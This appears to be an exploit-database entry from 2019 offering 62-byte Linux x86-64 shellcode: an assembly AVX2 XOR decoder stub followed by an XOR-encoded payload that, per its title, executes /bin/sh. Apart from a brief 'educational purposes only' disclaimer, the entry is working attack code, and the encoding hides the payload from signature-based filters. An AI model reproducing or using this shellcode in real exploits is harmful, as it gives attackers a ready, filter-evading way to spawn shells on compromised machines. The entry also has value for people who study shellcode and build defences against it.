Exploits / Vulnerability Discovered : 2019-08-19 |
Type : shellcode |
Platform : linux_x86-64
This exploit / vulnerability Linux/x86_64 avx2 xor decoder + execve("/bin/sh") shellcode (62 bytes) is for educational purposes only and if it is used you will do on your own risk!
; this only works on machines with a CPU that supports AVX2 instructions
global _start
_start:
jmp call_decoder
decoder:
pop rsi
lea rdi, [rsi+1]
; shellcode is less than 32 bytes long. can decode with single 256-bit xor.
; for longer shellcodes a loop could be added
vpbroadcastb ymm1, [rsi] ; avx2
vmovdqu ymm0, [rdi] ; avx
vpxor ymm0, ymm1 ; avx2
vmovdqu [rdi], ymm0 ; avx
jmp encoded_shellcode
call_decoder:
call decoder
xor_value: db 0xaa
encoded_shellcode: db 0xe2,0x9b,0x6a,0xfa,0xe2,0x23,0x48,0xe2,0x14,0x85,0xc8,0xc3,0xc4,0x85,0x85,0xd9,0xc2,0xfc,0xe2,0x23,0x4d,0xfa,0xfd,0xe2,0x23,0x4c,0x1a,0x91,0xa5,0xaf
*/